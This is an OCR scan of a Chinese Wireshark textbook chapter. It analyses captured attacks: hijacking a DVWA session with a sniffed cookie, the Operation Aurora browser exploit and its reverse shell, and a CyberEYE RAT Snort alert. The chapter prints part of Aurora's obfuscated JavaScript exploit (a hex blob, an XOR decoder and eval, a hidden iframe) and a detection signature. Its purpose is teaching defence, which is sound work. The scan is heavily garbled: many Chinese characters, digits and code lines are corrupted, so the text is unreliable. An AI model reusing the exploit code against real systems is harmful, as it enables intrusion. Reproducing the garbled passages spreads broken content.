如 采 你 清除 了 之 前 设置 的 岂 选 条 件 ， 并 浏览 数据 包 ， 吏 会 看 到 攻击 
者 的 卫 地 址 与 Web 服 务 器 的 通信 。 你 可 以 将 科 选 条 件 设 为 ip .addr == 
172.16.16.154 && ip.addr ==172.16.16.181 来 限定 查看 范围 。 


在 进一步 研究 之 前 ， 让 我 们 添加 一 个 栏目 ， 用 于 在 数据 包 列 表面 板 
中 显示 cookie 信 。 如 各 在 ARP 组 存 投 毒 的 过 程 中 深 加 了 一 些 栏 目 ， 请 乞 
将 它们 删除 。 之 后 ， 按 照 在 ARP 绥 存 投 毒 章节 提 到 的 操作 步骤 新 增 栏 
目 ， 栏 目的 字段 名 为 http.cookie pair。 添加 完成 后 ， 将 此 栏目 放 在 
目的 地 址 栏 之 后 。 界 面 看 起 来 如 图 12-14 所 示 。 


| Wireshark . Preferences 








Displayed Title Type Field Name 
Number 
Time (format as specified) 
Source address 
Destination Destination address 
Cookie pair Custom http.cookie_pair 
Protocol Protocol 
Info Information 


Filter Expressions 
Narme Resolution 
Protocols 

» Statistics 
Advanced 


KIKI KK RIN 

















图 12-14 ”设置 用 于 研究 会 话 支持 的 栏目 


新 的 栏目 设置 完成 后 ， 修 改 虹 选 条 件 ， 仅 显示 HITP 请 求 ， 此 处 
TCP 通 信 没 有 用 处 。 新 的 划 选 条 件 为 (ip.addr==172.16.16.154 && 
ip.addr== 172.16.16.181) && (http.request .method | | 
http.response.code)。 过 滤 后 的 数据 包 如 图 12-15 所 示 。 





No, Time Source Destination Cookie pair Protocol Info 
77 16.563884 172.16.16.154 172.16.16.181 security=low,PHPSESSID=lup78ajeuodkrhrvbmsjtgrd71 HTTP cET /dvwa/ HTTP/1.1 
79 16.565584 172.16.16.181 172.16.16.154 HTTP HTTP/1.1 382 Found 
88 16.576187 172.16.16.154 172.16.16.181 security=low, PHPSESSID=lup78ajeuodkrhrvbmsjtgrd7?1 HTTP 全 5ET /dvwa/ login.php HTTP/1.1 


81 16.575123 172.16.16.181 172.16.16.154 HTTP HTTP/1.1 288 OK (text/html) 
115 68.840166 172.16.16.154 172.16.16.18]1 security=low,PHPSESSID=ncobrqrb7fj2a2sinddtk567q4 HTTP 合 5ET /dvwa/ HTTP/1.1 

118 569.042241 172.16.16.181 172.16.16.154 HTTP HTTP/1.1 206 OK (text/html) 
128 64.292856 172.16.16.154 172.16.16.181 security=low,PHPSESSID=ncobrqrb7fj2a2sinddtk567q4 HTTP @ 6ET /dvwa/setup.php HTTP/1.1 
122 6b4.2934091 172.16.16.18]1 172.16.16.154 HTTP HTTP/1.1 288 OK (text/html) 





图 12-15 ”攻击 者 伪装 为 受害 者 


现在 ， 我 们 查看 攻击 者 和 服务 占 之 间 的 通信 。 在 前 4 个 数据 包 中 ， 
攻击 者 请 求 /dvwa/ 目 录 人 @， 接 收 到 的 啊 应 状态 码 为 302; Web 服 务 颖 啊 应 
302 表 示 请 求 重 定 加 至 其 他 URL。 此 时 ， 攻 击 者 被 重 定 同人 至 登录 页 
面 /dvwa/login.php 信 。 攻 击 者 的 计算 机 请 求 登录 页 面食， 并 返回 为 请 求 
成 功 仆 。 两 次 请 求 均 使 用 会 话 ID lup70ajeuodkrhrvbmsjtgrd71。 


随后 ， 再 次 请 求 /dvwa/ 目 录 ， 我 们 注意 到 现在 会 话 有 D 人 @ 友 生 了 变 
化 。 会 话 ID 现 在 是 ncobrqrb7fj2a2sinddtk567q4， 与 之 前 受害 者 使 用 的 相 
辣 。 这 表明 ， 攻 击 者 操纵 会 话 ， 使 用 了 和 食 取 的 ID。 此 时 我 们 并 没有 被 重 
定向 至 登录 页 面 ， 请 求 返回 了 HTTP 200 状 态 码 ， 页 面 内 容 与 登录 后 的 
受害 者 看 到 的 一 人 臻 @。 攻 击 者 使 用 了 受害 者 的 ID dvwa/setup.php@， 页 
面 内 容 同 样 返 回 成 功 @。 攻 击 者 和 验证 成 功 的 受害 者 一 样 访问 DVYWA 网 
站 。 这 一 过 程 中 我 们 并 不 知道 受害 者 的 用 户 名 或 密码 。 


这 只 是 攻击 者 将 数据 包 分 析 变 为 攻击 工具 的 一 个 例子 。 通 常 我 们 认 
为 ， 当 攻击 者 能 够 看 到 与 通信 过 程 相关 的 数据 包 时 ， 将 为 恶意 活动 提供 
发 生 的 可 能 性 。 这 是 安全 专家 提倡 通过 加 密 保护 数据 传输 的 原因 之 一 。 


12.3” 涯 将 利用 


攻击 痢 古 吃饭 还 古 哆 淘 ， 束 要 看 汤 酒 利用 阶段 的 表现 了 。 攻 击 首 已 
经 研究 并 侦察 好 目标 ， 并 友 现 了 准备 利用 的 漏洞 ， 期 望 以 此 进入 目标 系 
统 。 在 本 章 剩 下 的 坑 幅 里 ， 我 们 将 关注 在 一 些 漏 调和 利用 技术 中 捕获 的 数 
据 包 。 这 些 漏 洞 包 括 近 期 的 Microsoft 漏 洞 、 通 过 ARP 绥 存 污染 攻击 重 定 
癌 流 量 ， 以 及 咨 急 数据 的 远程 访问 特洛伊 木马 。 


12.3.1 ”极光 行动 


2010 年 1 月 ， 极 交行 动 利用 了 一 个 当时 未 知 的 下 浏览 占 漏 洞 。 这 个 
允许 攻击 者 取得 Google 及 其 他 公司 的 目标 机 器 的 root 级 别 的 远程 
| 权限 。 


用 户 只 需要 用 包含 访 漏 洞 的 正 浏 览 右 访问 一 个 网 站 ， 吏 能 执行 这 个 
站 意 代 权 。 然 后 ， 攻 击 者 瓯 能 立刻 获得 用 户 机 堪 的 管理 员 权 限 。 攻 击 者 
使 用 了 “网 络 钓鱼 ?引诱 受害 者 。 所 请“ 网 络 钓 色 ”(Spear phishing) 是 指 
攻击 者 同 受 害 者 发 送 一 封 电 子 邮 件 ， 诱 导 受 害 者 蛙 击 邮件 中 的 链接 ， 从 
而 将 其 引导 至 一 个 恶意 网 站 。 通 常 ， 网 络 钓鱼 信息 看 起 来 部 像 来 目 可 信 
的 源 ， 因 此 它们 经 党 能 成 功 。 


在 极光 行动 的 案例 中 ， 我 们 从 用 户 单 击 钓鱼 邮件 中 链接 的 那 一 刻 开 
台 讲 起 。 这 些 数据 包 包 含 在 文件 aurora.pcap 中 。 


这 个 捕获 文件 以 受害 者 〈192.168.100.206) 和 攻击 者 
(192.168.100.202) 之 间 的 三 次 握手 开始 。 和 初始 化 连接 的 目标 是 80 站 
口 ， 这 使 我 们 相信 它 是 HTTP 流 量 。 第 四 个 数据 包 证 实 了 我 们 的 假设 ， 
它 是 一 个 对 /info 的 HITP GET 请 求 @， 如 图 12-16 所 示 。 


| Wireshark , Packet 4 . aurora 


> Frame 4: 345 bytes on wire (2768 bits), 345 bytes captured (2768 bits) 

> Ethernet II, Src: Vmware 687:ae:27 (00:0c:29:07:ae:27)，Dst: HewlettP bf:91:ee (0@0:25:b3:bf:91:ee) 

> Internet Protocol Version 4, Src: 192.168.188.286, Dst: 192.168.188.282 

> Transmission Control Protocol, Src Port: 1931 (1831), Dst Port: 88 (88), Seq: 3982976894, Ack: 3836725423, Len: 


FT ny 3 
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n 
Accept-Language: en-us\r\n 
Accept-Encoding: gzip, deflate\r\n 
User-Agent: Mozilla/4.8 (compatible; MSIE 6.8; Windows NT 5.1; SV1)\r\n 

: 192.168.188.282\r\n 


[HTTP request 1/3] 
Response in frame: 6 
[Next request in frame: 7 了 |] 


No,: 4 " Time’ 0.000465 " Source: 192,168,100.206 " Destination: 192,168., 100.202 * Cookie pair: " Proweol HTTP * Lengthr 345 ° Infor GET /into HTTPY,I 





图 12-16 ”受害 者 做 了 一 次 针对 /info 的 GET 请 求 


攻击 着 的 机 规 硝 认 收 到 了 了 GET 请求， 并 在 数据 包 6 中 返回 了 一 个 
302 (Moved Temporarily) 人 码 。 这 个 状态 人 码 通 党 用 于 将 浏览 占 章 定 问 到 
男 一 个 页 面 ， 在 这 个 案例 中 正 是 如 此 。 与 302 返 回 码 @ 一 起 来 的 还 有 一 
个 Location 字 段 ， 它 指明 重 定 同位 置 是 /info?rFfWELUjLJHpP 信 ， 如 图 
12-17 所 示 。 


帮 Wireshark ,packet 6.aurora 


> Frame 6: 191 bytes on wire (1528 bits), 191 bytes captured (1528 bits) 
> Ethernet II, Src: HewlettP bf:91:ee (99:25:b3:bf:91:ee)，Dst: Vmware 67:ae:27 (6030c:29:07:ae:27) 
> Internet Protocol Version 4, Src: 192.168.109.2092，Dst: 192.168.188.286 
> Transmission Control Protocol, Src Port: 88 (88), Dst Port: 1931 (1831), Seq: 3836725423, Ack: 3982971185, Len: 137 
v . 
Content-Type: text/html\r\n 
Location: /info?rFfWwELUjLIHpP\r\n @ 
Connection: Keep-Alive\r\n 
Server: Apache\r\n 
> Content-Length: 8\r\n 
\r\n 
[HTTP response 1/3] 
[Time since request: 日 .478192B66 secon ds] 
uest in frame: 4 
[Next request in frame: 7] 
[Next response in frame: 18] 


No.: 6 * Time: 0.278842 * Source: 192,168.100.202 * Destination: 192.168.100.2086 " Cookie pairr * Prowoeol: HTTP " Length: 191 ° Into: HTTA/i.I 302 Moved 





[ cose || Hep 








图 12-17 客户 六 浏览 右 被 这 个 数据 包 草 定 问 


收 到 HTTP 302 数 据 包 后 ， 客 户 问 在 数据 包 7 中 初始 化 了 另 一 个 针 
对 /info?rFfWELUjLJHpP 这 个 UREL 的 GET 请 求 ， 然 后 在 数据 包 8 中 收 到 了 
一 个 ACK。ACK 之 后 的 几 个 包 表 示 从 攻击 者 发 往 受 害 者 的 数据 。 为 了 
更 好 地 查看 那些 数据 ， 右 击 当 前 TCP 流 的 任 一 个 数据 包 ， 如 数据 包 9， 
选择 Follow TCP Stream。 在 这 个 数据 流 的 输出 中 ， 我 们 看 到 了 初始 
GET 请 求 、302 重 定 同 ， 以 及 第 二 个 GET 请 求 ， 如 图 12-18 所 示 。 


作 此 之 后 ， 事情 变 得 十 分 奇怪 了 。 攻 击 者 同 GET 请 求 啊 应 了 一 些 看 
起 来 非常 奇怪 的 内 容 。 图 12-19 显 示 了 这 些 内 容 的 第 一 部 分 。 


这 些 内 容 好 像 是 <script> 标 签 内 的 一 系列 随机 数字 和 字母 @。HTML 
有 的 <script> 标 俭 表 示 使 用 了 一 种 高 级 脚本 语言 。 在 这 个 标签 内 ， 你 通 
会 看 到 各 种 脚本 语句 。 但 这 些 乱 码 表 明 真 正 的 内 容 可 能 已 经 被 特殊 编 
码 以 逃避 检测 了 由 于 我 们 知道 这 是 一 个 漏洞 利用 的 流量 ， 因 此 我 们 可 
nem 归 的 文本 包含 了 十 六 进 制 填 充 以 及 真正 用 于 利用 漏 铜 服 
sheljcode。 





帮 Wireshark . Follow TCP Stream (tcp.stream eq 0) .aurora 一 口 xX 


GET /info HTTP/1.1 
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* 


Uage: en-us 
HR gzip, deflate 
User-Agent: Mozilla/4. (compatible; MSIE 6.9; Windows NT 5.1; SV1) 
ee t: 192.168.1080.2082 
nnection: Keep-Aliv 


HTTP/1.1 382 Moved 

a text/html 

Location 下 nfo?rFfWELUjLIHpP 

Con ee : Keep-Alive 

Serve 入 che 

Conte 2 Length: 6 

GET /info?rFfWELUjLIHpP HTTP/1.1 

Accept: sp xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* 


Accept-Encoding: gzip, 

User-Agent: Mozilla/4. 2 i ble; MSIE 6.9; Windows NT 5.1; SV1) 
Host: 2 0 1808 .2082 

Co eep-Ali 





HTTP/1.1 288 OK 

Content- I text/html 
ragma: no-cache 

Connection: i -Alive 

Serve he 

Conte 2 Length: 11266 





3 chient pktlsl 10 server pktlsl 5 turms) 





Entire conversation (12 kB) ~ Show dataas |ASCI 7 Stre ed 


Hide this stream Print Sav Close Help 





图 12-18 发送 到 客户 痪 的 数 气流 





古 Wireshark . Follow TCP Stream (tcp.stream eq 0) -aurora 口 ~ 


<《1DOCTYPE HTML PUBLIC ™-//W3C//DTD HTML 4.8//EN™> 
<html> 
<head> 
<script> 税 

var IwpVuiFqihVySoJStwXmT = 
‘84271477133b888b1a8c2486339133c128e2885168e1583684d785885291588891b3e6e713e1122528b83123d85188839 
2c58d27123b8a6885833c1c@735321a2487358314142935258@829883c8a80866872f142624011f2a278022825882f253f2c3 
9394a716a2615275287142524357d43772c2782785a2f466a657Cc6e4a256a7458614176566Cc65257e4165319515158a@f 
2b35302a103doe03041e09234362f3a3c340973e1ibodedo2131le3f1635200e21191c38693913112e322223211f323930213 
3381b336aBc2c1175576c2e2713251f2388236b21278f2d3e2d353c172b83393164831d192ble363cB121872d31153823 
Gf2e113979498b83123d85188688392c8d27123b8a8865833c1c8735321a24867358314142935258829883c8a886866872f142 
624811f25278228258821253f2c39393125176614318627466a656e@d3a3968738@d261334463b1122383b87852d3d3785 
383e363486f85131d8b2934142b876d33657175843926244b261334461d362b31863d3e88263e1c118f11688f258e34882 
915091192209cle1lllc3d9e273f3a3a219509f2b2208341fBd4642c684d791c231177043e279b3562614b2613344622Beg83e 
1cedoe1lib3d1d31362b2712211700360D1a240230032e222638383d152b1a23162b9d3330239b14953e3e3c1a321537122 
d27643a386271d2439383b1211168a833e1c211e383f283e3e14313619821888112cle231683112d363975576c31261523 
112716327e2a28842f3e21113e5221212e233d131c8f1318223d2a246888212361718392626878a24872c2718253321882 
3892a15398917198d3e3318258Gd8c846853d84173d1c8f212b188828333c382d3e3d283688@89213286alc36371e4e7e3e39 
34186c271f1767352e1lf268ala2d281c3b3cle113411272e3d2419843d888611623c28@d1c3318332b3blc3d861f8b85@ 
8181683b173a166132238a@66d16266216881c1c85684d7860678d223c338d1139810678b801d82118b152f361f3818186a3ff 
1886725123a121534381f6c113b85152821162a3e211e2628210124868242e381127628665228124293389293c3321611a@ 
33a8488221435338831f8888Be22392c35278835137f656b78112a727c417587715565726928537b782e55254b7152366@ 
39618b75286d85364b7255723878385e2e6f3d49624b76432223746188693f7b47694863136423756c4f392c7d4969573 
3526f7c7d7801f75287b167587725f632369285e29797f5525417152616839315c78786d85644a728372382a6d592a6f3d 
44364b774322767b6153693f7c4164136313637c2a314f39737649665733556923287091f782b7c1175077f596e7469295 
e7b7e7a552546235264609396cg8787d6d9569107f5672392a6d597b6f3d1669462743227129665d693f2e13364763136e 
762a364f397e294336573354687171781175727c16758722586e726928537b2c7d55254b7752646839615b78726d853654 
77f5672382a365e746f3d4436147f4322777b315c693f7c116245631331217e624f392c7d4963573388337174781f7572 
71167587728076e7569285e742c7d5525467f88336839615375796d85644a74517238756d53756f3d43364b2443227c7d6 


dniddanhn d 门 hn 


了 10 sever pls 5 ants 
|Entire conversation (12 kB) 

















图 12-19 ”<script> 标 签 内 的 杂乱 内 容 看 起 来 像 是 被 编码 了 


图 12-20 显示 了 攻击 者 发 送 的 第 二 部 分 内 容 。 在 已 编 妈 文本 之 后 ， 
我 们 最 终 看 到 了 一 些 可 读 文 本 。 即 便 疫 有 丰富 的 编程 知识 ， 我 们 也 能 
出 这 些 文本 像 是 在 一 些 变量 的 基础 上 做 一 些 字 符 串 解析 。 这 是 闭合 标签 
</script> 之 前 的 最 后 一 些 文 本 比特 。 


翅 Wireshark .Follow TCP Stream (tcpstream eq 0) .aurora 





f7c2978148c877685672118285a2f7a2c2c2542255633193965897c2e1485681176828b387c365a28163d463342223a22 内 
252f65@e1831781368161a1367267c3136397a2b486342e3356347528891f7c29781486c86776856721168285a217a2c2c254 
2255633193965897c2e1485681176828b387c365a28163d483342223a22752f658e1831781368161a1367267c3136397a 
2b48342e3356347528891f7c2978146c@776856721168285a2f7a2c2c2542255633193965897c2e1465681176828b387c3 
65a28163d4863342223a227521658@e183f781368161a1367267c3148772c2782785a21466a657c6e4a256a74581d17831le 
le882e288c891d8a391c1c14282798c212c12]elelf371588858a2e352e3828383681882113b85853f1139338786123d8a3 
9312e@f222962398f222d3c186b522f4d7c6c37188f8932813d32872823888785198G41e8c38393d8b3e3483128b18188Tf 
2631883217804122d153e14236f292@2425142b2c8f38363c2924233d1lc8blb1lb48332438344a716a384b2d84271477316 
cr684a281e2615813989831a223b23322d3b8b28292387871381151486128643b8233372a833a2822215131"; 

Var RXb = "": 

for (i = @;i<IwpvVvuiFqihvySsoJStwXmT. length;i+=2) { 

RXb += 

string.fromcharCode(parseInt(IwpVuiFqihVySoJStwxmT .substring(i, i+2), 16)); 


var vuWGWsvUonxrQzpqgBXPrzNSKRGee = location.search.substring(1); 
Var NqxAxXnnXiILOBMwVynKoqnbp = ""; 
for (i=8;i<RXb.length;i++) 1{ 
NaqxAxXnnXiILOBMwVvnKoqnbp += 
string.fromCcharCtode(RXb.charCodeAtri) ~ vuWGWsvUonxrOzpqgBEXPrzNSKRGee.charCodeAtri 
%vuWGWsSVUonxrQzpqEBXPrZNSKRGee -lengthy) ) 3 


window[ "eval™ .replacefy/[A-z]7E，”)](NqxaxnriTLOBMwwVnkoqnbpy) 3 


</script> 

</head> 

<body> 

<span id="vhQYFCtoDNnOzUOuxAf 1DSzVMIHYhjJoJAOCHNZtQdlxSsPFUeEthCGdRtiIY"><iframe src="/ 
infowTVeeGDYIWNfsrdrvXiYApnuPoCcMjRrSszZuKtbVewuZCXwxKjtEclbPuJPPctcflhsttMRrsyxl.gif" ©@ 
onload="WisgEgTNEfaONekEqaMyAUALLMYW(event)™ /></spany</body></html> 

</body> 

3 chient phttsl 10 server pkisl 5 tes 


| Entire conversation (12 kB) ™ Show data as |ASCII 5 Stream 


Hide this stream Print | | Saveas... Close Help 








图 12-20 ”服务 占 及 壕 的 这 部 分 内 容 包 含 了 可 读 文 本 和 可 颖 的 iframe 


攻击 者 有 友 给 客户 病 的 最 后 一 段 数据 包 作 两 个 部 分 。 第 1 部 分 征 <span 
id="vhQYFCtoDnOzUOUXAfDSzVMIHYbjJojAOCHNZtQdxSPFUeEthCC 
第 2 部 分 包含 在 <span></span> 标 和 俭 内 ， 是 <iframe 
src="/infowT VeeGDYJWNIfsr 
drvXiYApnuPoCMjRrSZuKtbVgwuZCXwxKjtEclbPuJPPctcflhstt MRrSyxl.e 
"WisgEgTNEfaONekEqaMyAUALLMYW(event)" />@。 这 些 内 容 也 有 可 
能 是 恶意 行为 的 标志 ， 因 为 这 些 文本 出 奇 的 长 、 包 舍 不 可 读 的 随机 字符 
串 和 可 能 被 混 消 过 的 文本 。 


<span> 标 签 内 包含 了 一 个 iframe， 这 是 攻击 者 惯用 的 手法 ， 用 于 在 
HTML 页 面 中 周 入 额外 内 容 。<iframe> 标 签 创建 了 一 个 内 联 帧 ， 并 不 被 
用 户 察觉 。 在 这 个 案例 中 ，<iframe> 标 签 引 用 了 一 个 名 字 古 怪 的 GIF 文 
件 。 如 图 12-21 所 示 ， 当 受害 者 的 浏览 右 发 现 对 这 个 文件 的 引用 时 ， 它 
在 数据 包 21 中 发 送 了 一 个 GET 请 求 @， 紧 接着 GIF 文 件 束 被 传送 过 来 了 
信 。 这 个 GIF 文 件 有 可 能 外 e 用 来 以 某 种 方式 ， 触 发 已 经 下 载 到 受害 者 机 
名 上 的 泼 将 利用 代码 。 


Time Source Destination Protocol Info 
21 1.288241 192.168.168.2866 192.168.100.292 HTTP (1 1 /infowTVeeGDYJWNfsrdrvXiYApnuPoCMjRrSZuKtbVewu7ZCXwxKjtEclbPuJPpPpctcflhsttMRrSyxl.gif HTTP/1.1 
22 1.488288 192.168.1099.202 192.168.188.286 TCP 89 3 1831 [ACK] Seq=3836736951 Ack=3982971911 Win=64518 Len=0 


23 1.489366 192.168.168.262 192.168.169.266 HTTP HTTP/1.1 268@ Ok (GIF89a) (GIF89a) (image/gif) 
24 1.658958 192.168.199.296 192.168.169.262 TCP 1631 > 86 [ACK] Seq=3982971911 Ack=3836737898 Win=64993 Len=8 





图 12-21 受害 者 请 求 并 下 载 iframe 中 指明 的 GIF 文件 


当 受 害 者 同 攻 击 者 的 4321 新 口 和 初始 化 连接 时 ， 文 件 中 最 奇怪 的 一 部 
分 出 现 了 ， 请 看 数据 包 25。 从 Packet Details 面 板 中 查看 第 二 个 通信 者 流 并 
不 能 得 出 太 多 信息 ， 因 此 我 们 再 次 查看 TCP 通 信 流 以 更 清楚 地 了 解 传 输 
的 数据 。 图 12-22 显 示 了 Follow TCP Stream 窗 口 的 输出 。 


闫 Wireshark . Follow TCP Stream (tcp.stream eq 1) . aurora 


a De es 
.RW.R. 和 | i he 信和 < R 本 .1.1。 
Em ME TX -DSL[avzo. .Jhemd...WWW1.j.YV..f.D$<...D 
$ .DTPVVVFVNVVSVhy.? 站 < <. | 
-6.roj-s. .Microsoft Windows XP [Version 5.1.26868] 
(c) i 1985-2881 Microsoft Corp. @O 


C:\Documents and Settings\AMdministrator\Desktop>dir © 
dir 


Volume in drive C has no label. 
Volume Serial Number is 84AM-C85E 


Directory of C:\Documents and Settings\Administrator\Desktop 
87/13/2818 85:33 PM <DIR> 
867/13/2818 


07/13/2818 : data 日 

8687/71372019 - docs 

87/13/2818 - 227 passwords.txt 
(s) 227 bytes 

4 Dir(s) 19,271,598,888 bytes free 


C:\Documents and Settings\Administrator\Desktop> 


4 elient pt 3 server pktlsl 3 tons, 
Stream 


Entire conversation (893 bytes) 
| Find Next 


Help 





Find: 








图 12-22 ”攻击 者 通 连接 与 命令 窗口 交互 


在 这 里 ， 我 们 看 到 了 应 该 立即 引发 警报 的 东西 : 一 个 Windows 的 命 
邻 行 解 释 器 @O。 这 个 shell 是 由 受害 者 发 给 服务 器 的 ， 这 表明 攻击 独 成 功 
利用 了 漏 铀 : 一 旦 漏 铜 利用 程序 局 动 ， 客 户 闫 束 给 攻击 者 及 送 回 一 个 命 
令 行 解释 右 。 在 这 个 捕获 中 ， 我 们 甚至 站 看 到 攻击 者 与 受害 者 的 交互 ; 
输入 di 命令 人 @ 以 列 出 受害 者 机 器 的 目录 内 容 合 。 


攻击 者 进入 这 个 命令 行 解释 器 后 ， 对 受害 者 机 器 就 有 了 无 限制 的 管 
理 权 限 ， 他 几乎 能 做 任何 想 做 的 事情 。 受 害 者 只 不 过 是 轻 点 了 一 下 也 
标 ， 几 秒 钟 之 内 束 把 计算 机 的 完全 控制 权限 交 给 了 攻击 者 。 


像 这 样 的 漏洞 利用 程序 在 线路 上 传输 信息 时 通常 都 编 公 成 不 可 识别 
的 字符 ， 以 避免 被 网 络 IDS (入 侵 检 测 系 统 ) 发 现 。 束 其 本 丑 而 言 ， 没 
有 对 这 个 漏洞 利用 程序 的 事先 了 解 ， 也 没有 该 程序 的 代码 样本 ， 在 没有 
进一步 分 析 之 前 很 难说 清 受 害 者 系统 上 到 底 发 生 了 什么 。 幸 好 ， 我 们 可 


以 从 数据 包 捕 获 中 识别 出 恶意 代码 的 一 些 蛛 丝 马 迹 。 这 包括 <script> 标 
答 里 的 一 些 泥 清 文本 、 奇 怪 的 iframe， 以 及 明文 表示 的 命令 行 解释 器 。 


伍 ， 


我 们 在 这 里 总 结 一 下 极光 漏 镁 利用 程序 是 如 何 工 作 的 。 


受害 者 收 到 一 封 来 目 攻 击 者 的 邮件 ， 看 起 来 合理 ， 实 际 上 有 针对 
性 ， 单 击 里 面 的 一 个 链 握 ， 同 攻击 着 的 悉 意 网 站 及 这 一 个 GET 请 


求 。 

攻击 者 的 Web 服 务 硕 同 有 党 害 者 肥 出 302 重 定 回 ， 有 党 害 者 的 浏览 需 同 
重 定 同 URE 目 动 发 起 一 个 GET 请 求 。 

攻击 者 的 Web 服 务 需 同 客 户 疹 发 送 一 个 人 对 有 混 消 的 JavaScript 代 三 
(包括 一 个 漏洞 利用 程序 ) 的 Web 页 面 ， 以 及 一 个 含有 恶意 GIF 图 
像 链接 的 iframe。 

受害 者 向 恶意 图 像 发 起 一 个 GET 请 求 ， 将 它 从 服务 器 上 下 载 下 来 。 
利用 下 浏览 器 的 漏洞 ， 使 用 恶意 GIF 文件 解 混 消 之 前 发 送 的 
JavaScript 代 人 码 ， 并 在 受害 者 机 右上 执行 。 

一 旦 漏洞 被 成 功利 用 ， 束 执行 隐藏 在 混淆 代码 中 的 payload， 从 受害 
者 问 攻 击 者 的 4321 端 口 打开 一 个 新 会 话 。 
该 payload 会 产生 一 个 命令 行 解释 器 并 返回 给 攻击 者 ， 以 便 攻 击 者 与 
目标 进行 交互 。 


从 防御 的 观点 看 ， 我 们 可 以 使 用 这 个 捕获 文件 为 IDS 创 建 一 个 特 
也 证 能 有 助 于 检测 这 种 攻击 。 举 个 例子 ， 我 们 可 以 过 渡 捕 葡文 件 的 


非 混 消 部 分 ， 比 如 <script> 标 签 里 混 消 文本 末尾 的 明文 代码 。 另 外 一 个 
思路 是 为 所 有 包含 302 重 定 同 到 特定 URL 的 HTTP 流 量 写 一 个 特征 。 为 能 


在 生产 坏 卉 中 使 用 这 个 特征 ， 还 需要 一 些 和 额外 的 调整 ， 


但 这 已 经 是 个 很 


好 的 开 病 。 
EB 


下 民 
ZJ o 





对 蔡 试 防御 网 络 未 知 威 肋 的 人 而 言 ， 基 于 恶意 访 量 样本 创建 流量 特征 是 非 营 关键 的 一 
这 里 描述 的 捕获 是 提升 编 与 特征 拉 能 的 好 方法 。 








12.3.2 ”远程 访问 特洛伊 木马 


到 目前 为 止 ， 我 们 已 经 利用 先 验 知识 查看 了 一 些 安全 事件 。 这 是 学 


习 攻 击 形态 的 好 办 法 ， 但 却 不 太 符 合 实 际 。 在 真实 世界 里 ， 和 守护 网 络 安 
全 的 人 不 可 能 得 看 网 络 中 的 每 一 个 数据 包 。 他 们 会 使 用 各 去 各 样 的 IDS 
设备 ， 基 于 预定 义 的 攻击 特征 ， 来 所 醒 他 们 留意 网 络 流量 里 的 弄 第 情 
况 ， 并 实施 进一步 检查 。 


在 下 一 个 案例 中 ， 我 们 将 像 分 析 真 正 的 网 络 威胁 一 样 ， 从 一 个 人 简 早 
的 警报 开始 。 在 这 个 例子 中 ， 我 们 的 IDS 生 成 了 这 个 警报 : 


[**] [1:132456789:2] CyberEYE RAT Session Establishment [**] 
[Classification:A Network Trojan was detected|] [Priority:1] 


607/18-12:45:64.656854 172.16.0.111:4433 -> 172.16.0.114:6641 
TCP TTL:128 TOS3:0x6 ID:6526 IpLen:26 DgmLen:54 DF 
*****AP*** Seq:0Xx53BAEB5E Ack:0x18874922 Win:8xFAF@ TcpLen:20 





下 一 步 我 们 将 碍 看 触及 此 次 警报 的 特征 规则 : 


alert tcp any any -> $HOME NET any (msg:"CyberEYE RAT Session Establishmen 
tt 


content:"|41 4E 41 42 49 4C 47 49 7C|"; classtype:trojan-activity; 
sid:132456789; rev:2;) 





这 个 规则 是 这 样 定义 的 : 当 它 发 现 一 个 进入 内 网 的 数据 包含 有 十 六 
进 制 内 容 41 4E 41 42 49 4C 47 49 7C 时 ， 就 产生 警报 。 这 个 内 容 转换 成 
可 谈 ASCII 码 是 ANA BILGI。 当 检测 到 这 个 字符 串 啊 起 警报 时 ， 可 能 预 
示 着 CyberEYE 远 程 访问 木马 〈Remote-access Trojan，RAT) 的 出 现 。 
RAT 是 秘密 运行 在 受害 者 计算 机 上 的 恶意 应 用 程序 ， 它 同 攻 击 者 建立 连 
接 ， 使 攻击 者 能 远程 管理 受害 者 的 机 器 。 


| 注 喜 午时 时 时 时 时 时 时 时 时 时 时 


CyberEYE 是 来 自 土耳其 的 工具 ， 用 于 产生 RAT 程 序 和 管理 “< 肉鸡 *”。 有 趣 的 是 ， 这 里 看 到 
的 Snort 规 则 有 一 个 敏感 字符 串 “ANA BILGI”"， 它 其 实 是 土耳其 文字 ， 表 示 “ 基 本 信息 ”的 意 
村 


以 





现在 我 们 将 在 ratinfected.pcap 文 件 中 得 看 与 警报 有 天 的 流量 。Snort 
通 遇 只 捕获 触发 警报 的 日 个 数据 包 ， 但 对 好 我 们 有 主机 间 的 完整 通信 序 
列 。 让 我 们 搜索 Snort 规 则 中 提 到 的 十 六 进 制 字符 串 ， 直 接 跳 到 关键 部 


Sa 


(1) 选择 Edit->Find Packet。 

(2) 选择 Hex Value 单 选 按钮 。 

(3) 在 文本 框 输入 41 4E 41 42 49 4C 47 49 7C 。 
(4) 早 击 Find。 


如 图 12-23 所 示 ， 你 最 完 在 数据 包 4 的 数据 部 分 友 现 了 以 上 字符 串 





> Frame 4: 68 bytes 0 bits), 68 bytes c red (544 bits) on interface 
， Ethernet II, Src: Vmware 87:ae:27 (89:8c:29:97:a oe Dst: Hewlettp bf:91: Ee 
> Internet Protoc ol Ver c: 172.16.0.111, Dst: 172.16.9.114 
Transmission Control 让 SR: ol, Src Port: 4433 (4433), Dst Port: 6641 (6641), Seq: 1464758878，Ack: 411519266, Len: 14 
Y Data es s) 
Data: 414e4142494c47497c3535369doa 各 
[Le pt 1 
600 600 25 b3 bf 91 ee 00 Oc 29 07 ac 可 B09 和 5 昌 
5010 80 36 19 7e 0 66 88 42 ac 18 80 6f ac 109 





$0828 69 72 11 51 19 f1 53 ba eb 5e 18 87 49 22 59 18 
900830 fa f0 be 2b 60 00 二 全 和 汪汪] 


35 36 Bd Ba 








7 Dat (data,data), 14bytes || packets: 779 Displayed: 779 (100.0%) * Load time:; 0;0,8|| Profile: Default 





图 12-23 ”最 先 在 数据 包 4 中 发 现 了 Snort 警 报 中 的 字符 串 内 容 


行 多 次 选择 Edit->Find Next， 你 会 看 见 这 个 字符 串 也 在 数据 包 5、 
10、32、156、280、405、531 和 652 出 现 了 。 虽 然 这 个 捕获 文件 里 的 所 
有 通信 和 都 是 在 攻击 者 〈172.16.0.111) 和 受害 者 (172.16.0.114) 之 间 产 
生 的 ， 但 看 起 来 这 个 字符 串 出 现在 了 不 同 的 会 话 中 。 数 据 包 4 和 5 使 用 
